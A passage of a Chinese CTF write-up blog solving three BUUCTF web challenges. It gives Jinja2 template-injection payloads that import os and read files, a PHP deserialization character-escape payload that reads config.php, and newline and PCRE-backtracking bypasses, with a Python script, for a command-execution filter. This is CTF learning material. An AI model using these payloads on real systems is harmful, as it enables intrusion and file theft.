<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;&#123;% if c.__name__==&#x27;catch_warnings&#x27; %&#125;&#123;&#123; c.__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;__imp&#x27;+&#x27;ort__&#x27;](&#x27;o&#x27;+&#x27;s&#x27;).listdir(&#x27;/&#x27;)&#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e6.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e6.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>看到疑似存 flag 的文件 this_is_the_flag.txt，读取</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% for c in ().__class__.__base__.__subclasses__() %&#125;&#123;% if c.__name__==&#x27;catch_warnings&#x27; %&#125;&#123;&#123; c.__init__.__globals__[&#x27;__builtins__&#x27;].open(&#x27;/this_is_the_f&#x27;+&#x27;lag.txt&#x27;, &#x27;r&#x27;).read() &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e7.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e7.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p c2dc6edd-17b4-4a66-b3b6-8f5767e19304>得到 flag</p>
<p>参考文章：<a target="_blank" rel="noopener" href="https://blog.csdn.net/SopRomeo/article/details/105875248">https://blog.csdn.net/SopRomeo/article/details/105875248</a></p>
<p>​					<a target="_blank" rel="noopener" href="https://blog.csdn.net/rfrder/article/details/110240245">https://blog.csdn.net/rfrder/article/details/110240245</a></p>
<p>​					<a target="_blank" rel="noopener" href="https://mayi077.gitee.io/2020/04/17/GYCTF2020-FlaskApp/">https://mayi077.gitee.io/2020/04/17/GYCTF2020-FlaskApp/</a></p>
<h2 id="0ctf-2016piapiapia"><a class="markdownIt-Anchor" href="#0ctf-2016piapiapia">#</a> [0CTF 2016]piapiapia</h2>
<p>多次尝试登录，能得到的只有 Invalid password 或者 Invalid user name or password</p>
<p>扫一下看看</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e8.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e8.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>扫出来了几个， <code>/register.php</code>  注册完之后可以登录</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e9.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e9.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>那 update 和 profile 的作用应该都差不多知道了，这个有个浏览选择文件，难道是文件上传漏洞吗？</p>
<p>有个 zip 先下载看看，防止等下文件上传半天无用功</p>
<p>代码审计，config 中看到了 flag 字眼</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e20.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e20.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>在审计 profile 和 update 的时候看到了几个熟悉的函数</p>
<p>profile 中的 <code>unserialize</code>  和 <code>file_get_contents</code></p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e10.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e10.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>update 中的 <code>unserialize</code></p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e11.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e11.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>查看 profile 中 file_get_contents 函数中的参数 photo，底下的 html 中有一个 echo 参数 photo，猜测本题的突破口就在这个参数中</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e12.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e12.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>倒推会去，看看 photo 参数怎么得到的</p>
<p>photo 内容存在 profile 数组键值为 photo 中，profile 有从 user 的 show_profile 传过来，而且和 username 这个参数相关</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e13.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e13.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>继续往上看，跟到 class.php 中，在 user 类中找到 show_profile 函数</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e14.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e14.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>这里调用了父类 mysql 类的 filter 函数以及 select，先看看 filter</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e15.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e15.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &amp;$count ]] )</span><br><span class="line"></span><br><span class="line">preg_replace (正则表达式, 替换成什么东西, 目标字符串)</span><br></pre></td></tr></table></figure>
<p>先将 escape 数组内的单引号和两个 <code>\\</code>  用 <code>|</code>  和两个 <code>/</code>  连接起来，得到一个正则表达式，匹配的是单引号和双斜杠 <code>\\</code> ，将这两个全部换成下划线 <code>_</code></p>
<p>同理 safe 参数中也是构造一个正则表达式， <code>/select|insert|update|delete|where/i</code>  不区分大小写地匹配这些关键字，将这些替换成 hacker 返回</p>
<p>再看看 select 函数</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e16.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e16.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>常见的 sql 查询语句，在查询之前，如果我们注册了新的用户，需要更新一下表单，找一下插入新数据的函数</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e17.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e17.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>然后再去找找哪里调用了这个函数</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e18.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e18.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>username 和 new_profile 两个参数都经过了 filter 的过滤才插入表中，接着找找 update_profile 在哪里调用了</p>
<p>在 update.php 中可以找到</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e19.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e19.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>通过 post 方法得到信息之后序列化在传入，同时看到 photo 传入之后会被 md5 编码了</p>
<p>倒推完成之后就可以理清楚调用链条了</p>
<p>update.php profile 的 POST 传参 -&gt;class.php update_profile ()-&gt;update ()-&gt; 数据库中的表单 -&gt;select ()-&gt;show_profile ()-&gt;profile.php file_get_contents ()</p>
<p>回到 file_get_contents 函数中说的那个 photo 参数，在审计 update 的时候发现传入的 photo 文件会被 md5 编码了，所以不得不换一个参数了，nickname 参数，可能是因为 nickname 的字符匹配相对没有那么严格吧，在 update.php</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e21.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e21.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>这一题用到了之前刷题学过的反序列化字符逃逸，重新复习一下在 buuctf 刷题 4 中的 [安洵杯 2019] easy_serialize_php</p>
<p>回到这一题，这题也是用到了字符逃逸，我们的目标是读取 config.php 函数，上面写到了 config.php 函数里有 flag 字样，尝试读取</p>
<p>在构建反序列化的同时 profile 文件里面有反序列化的顺序 nickname 参数后面还有 photo 参数，这是读取文件的地方</p>
<p>但是如何才能让 nickname 参数的反序列化后传给 photo 我们想要的内容呢，在上面的正则表达式中 where 会被替换成 hacker，从 5 位变成 6 位，如果我们有一定数的 where，再替换成 hacker 之后，序列化 <code>s:字符数量:&quot;字符&quot;</code> ，字符数量这个数字不变，实际上双引号内的字符从 5 变成 6，如果我们用定量的 where，就能把 nickname 的反序列化的内容顶出去，成为 photo 的内容</p>
<p>用具体的数字来说，假如我传入 20 个 where，以及长度为 20 的攻击命令，字符数量填 120，where 占 100，但是在经过替换成 hacker 之后，where 就变成了 120 个字符，还有 20 的攻击命令，我们填的是 120，但是现在实际上有 140 个字符，反序列化之后 nickname 根据我们写的字符数量只取前 120 个，剩下的 20 个就可以是我们的攻击指令</p>
<p>尝试构造，我们想要让攻击命令传到 photo 参数中，是需要伪造一个 photo 参数的序列化即 <code>s:5:&quot;photo&quot;;</code> ，同时需要加上读取 config.php 的序列化 <code>s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;</code></p>
<p>这时候不能忘记有个对 nickname 长度检测的函数，所以 nickname 需要传入 nickname [] 以数组形式绕过检测，而数组的序列化和字符的序列化有所不同，这里我就不复现了直接借一下图</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e22.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e22.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>可以清晰的看到数组还多了一个 {} 的闭合，所以在 where 的最后还需要加上一个} 来闭合</p>
<p>先构造出除去 where 的 payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;;&#125;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>最前面的双引号是用来闭合 where 字符的，大括号用来闭合数组的，这些字符总共有 34 个，所以我们需要 34 个 where 来把这些攻击命令挤出去，为什么 <code>;&#125;</code>  也要挤出去呢，因为这些闭合的符号是不计在 <code>s:数量:字符</code> 数量中的</p>
<p>ok 添加 34 个 where 得到最终的 payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere&quot;;&#125;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>通过 register 界面注册一个账号，update 完成字符逃逸获取 flag，用 bp 抓包</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Content-Disposition: form-data; name=&quot;nickname[]&quot;</span><br><span class="line"></span><br><span class="line">wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere&quot;;&#125;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e23.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e23.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>放包查看 profile</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e24.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e24.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>base64 解码</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e25.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e25.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>拿到 flag， <code>$flag = 'flag&#123;fd06d0b1-5eb2-45f1-b3a0-2bacf858424a&#125;';</code></p>
<p>参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43622442/article/details/105751356">https://blog.csdn.net/qq_43622442/article/details/105751356</a></p>
<p>这审计太花眼了，一个个函数的推导感觉要做很多才会有很清晰的思路，还需要学习</p>
<h2 id="fbctf2019rceservice"><a class="markdownIt-Anchor" href="#fbctf2019rceservice">#</a> [FBCTF2019]RCEService</h2>
<p>本题要用 JSON 格式，先试一下查看目录试试看吧</p>
<p><code>&#123;&quot;cmd&quot;:&quot;ls&quot;&#125;</code></p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b1.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b1.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>读取一下 index.php 看看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;cmd&quot;:&quot;cat index.php&quot;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b2.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b2.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>被过滤了吗，试了试别的常用指令，都是这样，可能存在过滤吧，看了看师傅们的 wp，哪来的源码啊</p>
<p>没办法，只能拿过来先学了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">putenv</span>(<span class="string">&#x27;PATH=/home/rceservice/jail&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;cmd&#x27;</span>])) &#123;</span><br><span class="line">  <span class="variable">$json</span> = <span class="variable">$_REQUEST</span>[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!<span class="title function_ invoke__">is_string</span>(<span class="variable">$json</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;Hacking attempt detected&lt;br/&gt;&lt;br/&gt;&#x27;</span>;</span><br><span class="line">  &#125; <span class="keyword">elseif</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/&#x27;</span>, <span class="variable">$json</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;Hacking attempt detected&lt;br/&gt;&lt;br/&gt;&#x27;</span>;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;Attempting to run command:&lt;br/&gt;&#x27;</span>;</span><br><span class="line">    <span class="variable">$cmd</span> = <span class="title function_ invoke__">json_decode</span>(<span class="variable">$json</span>, <span class="literal">true</span>)[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$cmd</span> !== <span class="literal">NULL</span>) &#123;</span><br><span class="line">      <span class="title function_ invoke__">system</span>(<span class="variable">$cmd</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">&#x27;Invalid input&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;br/&gt;&lt;br/&gt;&#x27;</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>先对传入的 cmd 检测是否为字符串，如果是字符串就进行正则的检测，但是也没看到 cat 啥的被过滤啊</p>
<p>在看 wp 的时候看到了这个是和环境变量有关系， <code>putenv('PATH=/home/rceservice/jail');</code>  本题的环境变量被替换成了这个，而 cat 一般都是在 <code>usr/bin</code>  目录下的，所以用这个命令需要使用绝对路径</p>
<p>正则匹配表达式采用了 <code>^    $</code>  的格式，同时也采用了 <code>.*</code>  这样的贪婪匹配，这就可以引出两种解法，一个是 <code>%0A</code>  的 <code>preg_match</code>  的多行绕过和回溯次数超限，详细的回溯次数超限可以看这个 https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html</p>
<p><strong>%0A</strong></p>
<p>%0A 的绕过是因为 preg_match 只会匹配一行的数据，加上正则表达式中存在 <code>\x00-\x1FA</code>  会匹配一个 %0A</p>
<p>所以构造 payload 的时候，前后多加几个 %0A 就能达成绕过的效果了</p>
<p>先查看 path 环境下各级目录，能不能找到 flag，jail 就是 index.php 已经知道了，查看上一级</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=%0A&#123;&quot;cmd&quot;:&quot;ls /home/rceservice/&quot;&#125;%0A%0A</span><br></pre></td></tr></table></figure>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b4.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b4.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>存在 flag，直接读取，注意要用 cat 的绝对路径</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=%0A&#123;&quot;cmd&quot;:&quot;/bin/cat /home/rceservice/flag&quot;&#125;%0A%0A</span><br></pre></td></tr></table></figure>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b3.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b3.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p><strong>回溯次数超限</strong></p>
<p>详细的可以看上面提到的链接，这里直接上脚本读取了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://4e855554-62b3-45bc-a775-aed80066cc3e.node5.buuoj.cn:81/&#x27;</span></span><br><span class="line"></span><br><span class="line">payload = &#123;</span><br><span class="line">    <span class="string">&#x27;cmd&#x27;</span>:<span class="string">&#x27;&#123;&quot;cmd&quot;:&quot;/bin/cat /home/rceservice/flag&quot;,&quot;temp&quot;:&quot;&#x27;</span>+<span class="string">&#x27;a&#x27;</span>*<span class="number">1000000</span>+<span class="string">&#x27;&quot;&#125;&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">req = requests.post(url=url,data=payload).text</span><br><span class="line"><span class="built_in">print</span>(req)</span><br></pre></td></tr></table></figure>
<p>变量 cmd 后面不能直接跟用来超出回溯限制的内容，会影响命令，所以需要一个新的变量用来存用来回溯的内容，这里引入新的变量 temp</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b5.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b5.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>参考：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/Article-kelp/p/16046129.html">https://www.cnblogs.com/Article-kelp/p/16046129.html</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/rfrder/article/details/110573955">https://blog.csdn.net/rfrder/article/details/110573955</a></p>

<div class="article-footer fs14">
    <section id="license">
      <div class="header"><span>License</span></div>
      <div class="body"><p>本文采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">署名 - 非商业性使用 - 相同方式共享 4.0 国际</a> 许可协议，转载请注明出处。</p>
</div>
    </section>
    </div>
</article>
<div class="related-wrap" id="read-next"><section class="body"><div class="item" id="prev"><div class="note">Newer</div><a href="/2024/06/06/Vulnstack%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA/">Vulnstack红日靶场</a></div><div class="item" id="next"><div class="note">Older</div><a href="/2024/02/25/buuctf%E5%88%B7%E9%A2%984/">buuctf刷题4</a></div></section></div>






<footer class="page-footer footnote"><hr><div class="text"><p>本站由 <a href="/">Dr4x3zz</a> 使用 <a target="_blank" rel="noopener" href="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.29.1">Stellar 1.29.1</a> 主题创建。<br>
本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议，转载请注明出处。</p>
</div></footer>
<div class="main-mask" onclick="sidebar.dismiss()"></div></div><aside class="l_right">
<div class="widgets">



<widget class="widget-wrapper toc" id="data-toc" collapse="false"><div class="widget-header dis-select"><span class="name">On This Page</span><a class="cap-action" onclick="sidebar.toggleTOC()" ><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg></a></div><div class="widget-body"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#gyctf2020flaskapp"><span class="toc-text"> [GYCTF2020]FlaskApp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0ctf-2016piapiapia"><span class="toc-text"> [0CTF 2016]piapiapia</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fbctf2019rceservice"><span class="toc-text"> [FBCTF2019]RCEService</span></a></li></ol></div><div class="widget-footer">

<a class="top" onclick="util.scrollTop()"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-width="1.5"><path d="M2 12c0-4.714 0-7.071 1.464-8.536C4.93 2 7.286 2 12 2c4.714 0 7.071 0 8.535 1.464C22 4.93 22 7.286 22 12c0 4.714 0 7.071-1.465 8.535C19.072 22 16.714 22 12 22s-7.071 0-8.536-1.465C2 19.072 2 16.714 2 12Z"/><path stroke-linecap="round" stroke-linejoin="round" d="m9 15.5l3-3l3 3m-6-4l3-3l3 3"/></g></svg><span>Scroll to Top</span></a></div></widget>
</div></aside><div class='float-panel blur'>
  <button type='button' style='display:none' class='laptop-only rightbar-toggle mobile' onclick='sidebar.rightbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg>
  </button>
  <button type='button' style='display:none' class='mobile-only leftbar-toggle mobile' onclick='sidebar.leftbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-width="1.5"><path d="M2 11c0-3.771 0-5.657 1.172-6.828C4.343 3 6.229 3 10 3h4c3.771 0 5.657 0 6.828 1.172C22 5.343 22 7.229 22 11v2c0 3.771 0 5.657-1.172 6.828C19.657 21 17.771 21 14 21h-4c-3.771 0-5.657 0-6.828-1.172C2 18.657 2 16.771 2 13z"/><path id="sep" stroke-linecap="round" d="M5.5 10h6m-5 4h4m4.5 7V3"/></g></svg>
  </button>
</div>
</div><div class="scripts">
<script type="text/javascript">
  const ctx = {
    date_suffix: {
      just: `Just`,
      min: `minutes ago`,
      hour: `hours ago`,
      day: `days ago`,
    },
    root : `/`,
  };

  // required plugins (only load if needs)
  if (`local_search`) {
    ctx.search = {};
    ctx.search.service = `local_search`;
    if (ctx.search.service == 'local_search') {
      let service_obj = Object.assign({}, `{"field":"all","path":"/search.json","content":true,"sort":"-date"}`);
      ctx.search[ctx.search.service] = service_obj;
    }
  }
  const def = {
    avatar: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/3442075.svg`,
    cover: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/cover/76b86c0226ffd.svg`,
  };
  const deps = {
    jquery: `https://cdn.jsdelivr.net/npm/jquery@3.7.1/dist/jquery.min.js`,
    marked: `https://cdn.jsdelivr.net/npm/marked@13.0.1/lib/marked.umd.min.js`
  }
  

</script>

<script type="text/javascript">
  const utils = {
    // 懒加载 css https://github.com/filamentgroup/loadCSS
    css: (href, before, media, attributes) => {
      var doc = window.document;
      var ss = doc.createElement("link");
      var ref;
      if (before) {
        ref = before;
      } else {
        var refs = (doc.body || doc.getElementsByTagName("head")[0]).childNodes;
        ref = refs[refs.length - 1];
      }
      var sheets = doc.styleSheets;
      if (attributes) {
        for (var attributeName in attributes) {
          if (attributes.hasOwnProperty(attributeName)) {
            ss.setAttribute(attributeName, attributes[attributeName]);
          }
        }
      }
      ss.rel = "stylesheet";
      ss.href = href;
      ss.media = "only x";
      function ready(cb) {
        if (doc.body) {
          return cb();
        }
        setTimeout(function () {
          ready(cb);
        });
      }
      ready(function () {
        ref.parentNode.insertBefore(ss, before ? ref : ref.nextSibling);
      });
      var onloadcssdefined = function (cb) {
        var resolvedHref = ss.href;
        var i = sheets.length;
        while (i--) {
          if (sheets[i].href === resolvedHref) {
            return cb();
          }
        }
        setTimeout(function () {
          onloadcssdefined(cb);
        });
      };
      function loadCB() {
        if (ss.addEventListener) {
          ss.removeEventListener("load", loadCB);
        }
        ss.media = media || "all";
      }
      if (ss.addEventListener) {
        ss.addEventListener("load", loadCB);
      }
      ss.onloadcssdefined = onloadcssdefined;
      onloadcssdefined(loadCB);
      return ss;
    },

    js: (src, opt) => new Promise((resolve, reject) => {
      var script = document.createElement('script');
      if (src.startsWith('/')){
        src = ctx.root + src.substring(1);
      }
      script.src = src;
      if (opt) {
        for (let key of Object.keys(opt)) {
          script[key] = opt[key]
        }
      } else {
        // 默认异步，如果需要同步，第二个参数传入 {} 即可
        script.async = true
      }
